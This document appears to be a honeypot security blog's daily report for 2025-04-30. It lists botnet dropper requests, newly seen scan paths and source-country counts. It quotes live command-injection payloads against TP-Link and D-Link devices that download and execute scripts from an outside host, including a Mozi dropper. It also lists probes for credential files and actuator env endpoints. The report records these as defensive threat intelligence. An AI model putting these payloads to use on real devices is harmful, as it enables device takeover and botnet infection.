Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-04-30

·681 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-30
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 81 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1752 requests were recorded during the day, originating from 3 different countries, with a peak of 388 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRSingapore
USSingapore
CNDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
124.131.139.15027;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
141.98.11.128GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
714\x04\x01\x01\xBB\x8E,\xD7\xA1\x00
811\x05\x01\x02
910CONNECT myip.wtf:443 HTTP/1.1
176GET /api/v1/ws/server HTTP/1.1
914GET http://ipv4.icanhazip.com/ HTTP/1.1
1682GET /.env.env HTTP/1.1
1702GET /env.xml HTTP/1.1
1712GET /.env.xml HTTP/1.1
1852GET /Awsconfig.json HTTP/1.1
1912GET /?format=json HTTP/1.1
1942GET /PHPInfo.php HTTP/1.1
1952GET /PhpInfo.php HTTP/1.1
1962GET /01-info.php HTTP/1.1
1972GET /info_php.php HTTP/1.1
1982GET /0info.php HTTP/1.1
1992GET /0-info.php HTTP/1.1
2002GET /0_info.php HTTP/1.1
2052GET /user_secrets.yml HTTP/1.1
2062GET /app/env/.env HTTP/1.1
2072GET /.env.html HTTP/1.1
2082GET /.env.list HTTP/1.1
2131GET /%61%70%69/%65%6e%37%36 HTTP/1.1
2171GET /%65%6e%76 HTTP/1.1
2471GET /EcnG HTTP/1.1
2481GET /PSCv HTTP/1.1
2511GET /%67%61%74%65%77%61%79/%65%6e%76 HTTP/1.1
2531GET /q1Ri HTTP/1.1
2571GET /%6d%61%6e%61%67%65%6d%65%6e%74/%65%6e%76 HTTP/1.1
2581GET /%6d%61%6e%61%67%65%6d%65%6e%74/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1
2591GET /%6d%61%6e%61%67%65/%65%6e%76 HTTP/1.1
2601GET /%6d%61%6e%61%67%65/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1
2611GET /%67%61%74%65%77%61%79/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1
2621GET /%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1
2631GET /%61%70%69/%61%63%74%75%61%74%6f%72/%65%6e%37%36 HTTP/1.1
2651GET /Kz4c HTTP/1.1
2721\x04\x01\x01\xBB@\xE9\xA3j\x00
2731GET /temp.env HTTP/1.1
2741GET /tmp.env HTTP/1.1
2771GET /security.txt HTTP/1.1
2781GET /security.yml HTTP/1.1
2791GET /settings.yml HTTP/1.1
2821GET /test.env HTTP/1.1
2851GET /twilio.xml HTTP/1.1
2861GET /twilio HTTP/1.1
2871GET /.twilio HTTP/1.1
2881GET /.twilio.env HTTP/1.1
2891GET /twilio.txt HTTP/1.1
2931GET /twilio.yml HTTP/1.1
2941GET /twilio.php HTTP/1.1
2951GET /twilio.js HTTP/1.1
2961GET /twilio.json HTTP/1.1
3021GET /._env HTTP/1.1
3031GET /_.env HTTP/1.1
3041GET /config/frontend_dev.php HTTP/1.1
3061GET /robots.txt/ HTTP/1.1
3081GET /api;/actuator;/en%76; HTTP/1.1
3091GET /57.129;/env; HTTP/1.1
3101GET /57.129;/actuator;/env; HTTP/1.1
3111GET /en%76; HTTP/1.1
3121GET /actuator;/en%76; HTTP/1.1
3131GET /api;/en%76; HTTP/1.1
3221GET /admin/config.php HTTP/1.0
3271GET /%61%70%69/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1
3281GET /%61%70%69/%69%6e%74%65%72%6e%61%6c/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1
3291GET /%61%70%69/%65%6e%76 HTTP/1.1
3301GET /61;/env; HTTP/1.1
3311GET /61;/actuator;/env; HTTP/1.1
3321GET /manage;/actuator;/env; HTTP/1.1
3331GET /manage;/env; HTTP/1.1
3341GET /management;/actuator;/env; HTTP/1.1
3351GET /management;/env; HTTP/1.1
3361GET /management/env HTTP/1.1
3551\x00\x04\x08*\x10\x00
3561\x00\x0E\x08\xA3\xEF\xCD\xC5EK:\xC4\x00\x00\x00\x00\x00
3571\x00\x0E8\xA3\xEF\xCD\xC5EK:\xC4\x00\x00\x00\x00\x00
3791GET /actuator;/env; HTTP/1.1
3851GET /api;/internal;/actuator;/env; HTTP/1.1
3861GET /api;/env; HTTP/1.1
3891GET /api;/actuator;/env; HTTP/1.1
3911GET /gateway;/env; HTTP/1.1
3921GET /gateway;/actuator;/env; HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0388NL
1330US
2283GB
3184SC
4100CN
568HK
651IN
745IS
841PL
939SG
1037DE
1130FR
1214AO
1314UA
1414CA
1513PT
1612KR
1710HR
188TH
196JP
206FI
216KW
226LA
236TR
245GH
255BE
264VE
274IT
284RU
294VN
303BR
312AL
322ES
332MC
342SA
351CO
361BG
371LT
381ID

Related

Report: 2025-04-29
·472 words
Repport Daily
Report: 2025-04-28
·428 words
Repport Daily
Report: 2025-04-27
·571 words
Repport Daily